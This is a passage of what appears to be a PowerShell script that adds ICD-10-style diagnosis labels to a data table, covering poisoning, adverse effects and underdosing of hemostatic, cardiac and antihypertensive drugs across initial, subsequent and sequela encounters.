hemostatic drug, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of hemostatic drugs","Underdosing of hemostatic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of hemostatic drugs","Underdosing of hemostatic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of hemostatic drugs","Underdosing of hemostatic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, accidental (unintentional)","Poisoning by other fibrinolysis-affecting drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, accidental (unintentional)","Poisoning by other fibrinolysis-affecting drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, accidental (unintentional)","Poisoning by other fibrinolysis-affecting drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, intentional self-harm","Poisoning by other fibrinolysis-affecting drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, intentional self-harm","Poisoning by other fibrinolysis-affecting drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, intentional self-harm","Poisoning by other fibrinolysis-affecting drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, assault","Poisoning by other fibrinolysis-affecting drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, assault","Poisoning by other fibrinolysis-affecting drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, assault","Poisoning by other fibrinolysis-affecting drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, undetermined","Poisoning by other fibrinolysis-affecting drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, undetermined","Poisoning by other fibrinolysis-affecting drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other fibrinolysis-affecting drugs, undetermined","Poisoning by other fibrinolysis-affecting drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other fibrinolysis-affecting drugs","Adverse effect of other fibrinolysis-affecting drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other fibrinolysis-affecting drugs","Adverse effect of other fibrinolysis-affecting drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other fibrinolysis-affecting drugs","Adverse effect of other fibrinolysis-affecting drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other fibrinolysis-affecting drugs","Underdosing of other fibrinolysis-affecting drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other fibrinolysis-affecting drugs","Underdosing of other fibrinolysis-affecting drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other fibrinolysis-affecting drugs","Underdosing of other fibrinolysis-affecting drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, accidental (unintentional)","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, accidental (unintentional)","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, accidental (unintentional)","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, intentional self-harm","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, intentional self-harm","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, intentional self-harm","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, assault","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, assault","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, assault","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, undetermined","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, undetermined","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticoagulant antagonists, vitamin K and other coagulants, undetermined","Poisoning by anticoagulant antagonists, vitamin K and other coagulants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticoagulant antagonists, vitamin K and other coagulants","Adverse effect of anticoagulant antagonists, vitamin K and other coagulants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticoagulant antagonists, vitamin K and other coagulants","Adverse effect of anticoagulant antagonists, vitamin K and other coagulants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticoagulant antagonists, vitamin K and other coagulants","Adverse effect of anticoagulant antagonists, vitamin K and other coagulants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of anticoagulant antagonist, vitamin K and other coagulants","Underdosing of anticoagulant antagonist, vitamin K and other coagulants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anticoagulant antagonist, vitamin K and other coagulants","Underdosing of anticoagulant antagonist, vitamin K and other coagulants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anticoagulant antagonist, vitamin K and other coagulants","Underdosing of anticoagulant antagonist, vitamin K and other coagulants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, accidental (unintentional)","Poisoning by other primarily systemic and hematological agents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, accidental (unintentional)","Poisoning by other primarily systemic and hematological agents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, accidental (unintentional)","Poisoning by other primarily systemic and hematological agents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, intentional self-harm","Poisoning by other primarily systemic and hematological agents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, intentional self-harm","Poisoning by other primarily systemic and hematological agents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, intentional self-harm","Poisoning by other primarily systemic and hematological agents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, assault","Poisoning by other primarily systemic and hematological agents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, assault","Poisoning by other primarily systemic and hematological agents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, assault","Poisoning by other primarily systemic and hematological agents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, undetermined","Poisoning by other primarily systemic and hematological agents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, undetermined","Poisoning by other primarily systemic and hematological agents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other primarily systemic and hematological agents, undetermined","Poisoning by other primarily systemic and hematological agents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other primarily systemic and hematological agents","Adverse effect of other primarily systemic and hematological agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other primarily systemic and hematological agents","Adverse effect of other primarily systemic and hematological agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other primarily systemic and hematological agents","Adverse effect of other primarily systemic and hematological agents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other primarily systemic and hematological agents","Underdosing of other primarily systemic and hematological agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other primarily systemic and hematological agents","Underdosing of other primarily systemic and hematological agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other primarily systemic and hematological agents","Underdosing of other primarily systemic and hematological agents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, accidental (unintentional)","Poisoning by unspecified primarily systemic and hematological agent, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, accidental (unintentional)","Poisoning by unspecified primarily systemic and hematological agent, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, accidental (unintentional)","Poisoning by unspecified primarily systemic and hematological agent, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, intentional self-harm","Poisoning by unspecified primarily systemic and hematological agent, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, intentional self-harm","Poisoning by unspecified primarily systemic and hematological agent, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, intentional self-harm","Poisoning by unspecified primarily systemic and hematological agent, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, assault","Poisoning by unspecified primarily systemic and hematological agent, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, assault","Poisoning by unspecified primarily systemic and hematological agent, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, assault","Poisoning by unspecified primarily systemic and hematological agent, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, undetermined","Poisoning by unspecified primarily systemic and hematological agent, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, undetermined","Poisoning by unspecified primarily systemic and hematological agent, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified primarily systemic and hematological agent, undetermined","Poisoning by unspecified primarily systemic and hematological agent, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified primarily systemic and hematological agent","Adverse effect of unspecified primarily systemic and hematological agent, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified primarily systemic and hematological agent","Adverse effect of unspecified primarily systemic and hematological agent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified primarily systemic and hematological agent","Adverse effect of unspecified primarily systemic and hematological agent, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified primarily systemic and hematological agent","Underdosing of unspecified primarily systemic and hematological agent, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified primarily systemic and hematological agent","Underdosing of unspecified primarily systemic and hematological agent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified primarily systemic and hematological agent","Underdosing of unspecified primarily systemic and hematological agent, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, accidental (unintentional)","Poisoning by cardiac-stimulant glycosides and drugs of similar action, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, accidental (unintentional)","Poisoning by cardiac-stimulant glycosides and drugs of similar action, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, accidental (unintentional)","Poisoning by cardiac-stimulant glycosides and drugs of similar action, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, intentional self-harm","Poisoning by cardiac-stimulant glycosides and drugs of similar action, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, intentional self-harm","Poisoning by cardiac-stimulant glycosides and drugs of similar action, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, intentional self-harm","Poisoning by cardiac-stimulant glycosides and drugs of similar action, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, assault","Poisoning by cardiac-stimulant glycosides and drugs of similar action, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, assault","Poisoning by cardiac-stimulant glycosides and drugs of similar action, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, assault","Poisoning by cardiac-stimulant glycosides and drugs of similar action, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, undetermined","Poisoning by cardiac-stimulant glycosides and drugs of similar action, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, undetermined","Poisoning by cardiac-stimulant glycosides and drugs of similar action, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cardiac-stimulant glycosides and drugs of similar action, undetermined","Poisoning by cardiac-stimulant glycosides and drugs of similar action, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of cardiac-stimulant glycosides and drugs of similar action","Adverse effect of cardiac-stimulant glycosides and drugs of similar action, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of cardiac-stimulant glycosides and drugs of similar action","Adverse effect of cardiac-stimulant glycosides and drugs of similar action, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of cardiac-stimulant glycosides and drugs of similar action","Adverse effect of cardiac-stimulant glycosides and drugs of similar action, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of cardiac-stimulant glycosides and drugs of similar action","Underdosing of cardiac-stimulant glycosides and drugs of similar action, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of cardiac-stimulant glycosides and drugs of similar action","Underdosing of cardiac-stimulant glycosides and drugs of similar action, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of cardiac-stimulant glycosides and drugs of similar action","Underdosing of cardiac-stimulant glycosides and drugs of similar action, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, accidental (unintentional)","Poisoning by calcium-channel blockers, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, accidental (unintentional)","Poisoning by calcium-channel blockers, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, accidental (unintentional)","Poisoning by calcium-channel blockers, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, intentional self-harm","Poisoning by calcium-channel blockers, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, intentional self-harm","Poisoning by calcium-channel blockers, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, intentional self-harm","Poisoning by calcium-channel blockers, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, assault","Poisoning by calcium-channel blockers, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, assault","Poisoning by calcium-channel blockers, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, assault","Poisoning by calcium-channel blockers, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, undetermined","Poisoning by calcium-channel blockers, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, undetermined","Poisoning by calcium-channel blockers, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by calcium-channel blockers, undetermined","Poisoning by calcium-channel blockers, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of calcium-channel blockers","Adverse effect of calcium-channel blockers, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of calcium-channel blockers","Adverse effect of calcium-channel blockers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of calcium-channel blockers","Adverse effect of calcium-channel blockers, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of calcium-channel blockers","Underdosing of calcium-channel blockers, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of calcium-channel blockers","Underdosing of calcium-channel blockers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of calcium-channel blockers","Underdosing of calcium-channel blockers, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, accidental (unintentional)","Poisoning by other antidysrhythmic drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, accidental (unintentional)","Poisoning by other antidysrhythmic drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, accidental (unintentional)","Poisoning by other antidysrhythmic drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, intentional self-harm","Poisoning by other antidysrhythmic drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, intentional self-harm","Poisoning by other antidysrhythmic drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, intentional self-harm","Poisoning by other antidysrhythmic drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, assault","Poisoning by other antidysrhythmic drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, assault","Poisoning by other antidysrhythmic drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, assault","Poisoning by other antidysrhythmic drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, undetermined","Poisoning by other antidysrhythmic drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, undetermined","Poisoning by other antidysrhythmic drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidysrhythmic drugs, undetermined","Poisoning by other antidysrhythmic drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antidysrhythmic drugs","Adverse effect of other antidysrhythmic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antidysrhythmic drugs","Adverse effect of other antidysrhythmic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antidysrhythmic drugs","Adverse effect of other antidysrhythmic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other antidysrhythmic drugs","Underdosing of other antidysrhythmic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antidysrhythmic drugs","Underdosing of other antidysrhythmic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antidysrhythmic drugs","Underdosing of other antidysrhythmic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, accidental (unintentional)","Poisoning by coronary vasodilators, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, accidental (unintentional)","Poisoning by coronary vasodilators, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, accidental (unintentional)","Poisoning by coronary vasodilators, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, intentional self-harm","Poisoning by coronary vasodilators, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, intentional self-harm","Poisoning by coronary vasodilators, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, intentional self-harm","Poisoning by coronary vasodilators, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, assault","Poisoning by coronary vasodilators, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, assault","Poisoning by coronary vasodilators, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, assault","Poisoning by coronary vasodilators, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, undetermined","Poisoning by coronary vasodilators, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, undetermined","Poisoning by coronary vasodilators, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by coronary vasodilators, undetermined","Poisoning by coronary vasodilators, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of coronary vasodilators","Adverse effect of coronary vasodilators, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of coronary vasodilators","Adverse effect of coronary vasodilators, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of coronary vasodilators","Adverse effect of coronary vasodilators, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of coronary vasodilators","Underdosing of coronary vasodilators, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of coronary vasodilators","Underdosing of coronary vasodilators, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of coronary vasodilators","Underdosing of coronary vasodilators, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, accidental (unintentional)","Poisoning by angiotensin-converting-enzyme inhibitors, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, accidental (unintentional)","Poisoning by angiotensin-converting-enzyme inhibitors, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, accidental (unintentional)","Poisoning by angiotensin-converting-enzyme inhibitors, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, intentional self-harm","Poisoning by angiotensin-converting-enzyme inhibitors, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, intentional self-harm","Poisoning by angiotensin-converting-enzyme inhibitors, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, intentional self-harm","Poisoning by angiotensin-converting-enzyme inhibitors, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, assault","Poisoning by angiotensin-converting-enzyme inhibitors, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, assault","Poisoning by angiotensin-converting-enzyme inhibitors, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, assault","Poisoning by angiotensin-converting-enzyme inhibitors, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, undetermined","Poisoning by angiotensin-converting-enzyme inhibitors, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, undetermined","Poisoning by angiotensin-converting-enzyme inhibitors, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by angiotensin-converting-enzyme inhibitors, undetermined","Poisoning by angiotensin-converting-enzyme inhibitors, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of angiotensin-converting-enzyme inhibitors","Adverse effect of angiotensin-converting-enzyme inhibitors, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of angiotensin-converting-enzyme inhibitors","Adverse effect of angiotensin-converting-enzyme inhibitors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of angiotensin-converting-enzyme inhibitors","Adverse effect of angiotensin-converting-enzyme inhibitors, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of angiotensin-converting-enzyme inhibitors","Underdosing of angiotensin-converting-enzyme inhibitors, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of angiotensin-converting-enzyme inhibitors","Underdosing of angiotensin-converting-enzyme inhibitors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of angiotensin-converting-enzyme inhibitors","Underdosing of angiotensin-converting-enzyme inhibitors, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, accidental (unintentional)","Poisoning by other antihypertensive drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, accidental (unintentional)","Poisoning by other antihypertensive drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, accidental (unintentional)","Poisoning by other antihypertensive drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, intentional self-harm","Poisoning by other antihypertensive drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, intentional self-harm","Poisoning by other antihypertensive drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, intentional self-harm","Poisoning by other antihypertensive drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, assault","Poisoning by other antihypertensive drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, assault","Poisoning by other antihypertensive drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, assault","Poisoning by other antihypertensive drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, undetermined","Poisoning by other antihypertensive drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, undetermined","Poisoning by other antihypertensive drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antihypertensive drugs, undetermined","Poisoning by other antihypertensive drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antihypertensive drugs","Adverse effect of other antihypertensive drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antihypertensive drugs","Adverse effect of other antihypertensive drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antihypertensive drugs","Adverse effect of other antihypertensive drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other antihypertensive drugs","Underdosing of other antihypertensive drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antihypertensive drugs","Underdosing of other antihypertensive drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antihypertensive drugs","Underdosing of other antihypertensive drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, accidental (unintentional)","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, accidental (unintentional)","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, accidental (unintentional)","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, intentional self-harm","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, intentional self-harm","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, intentional self-harm","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, assault","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, assault","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and 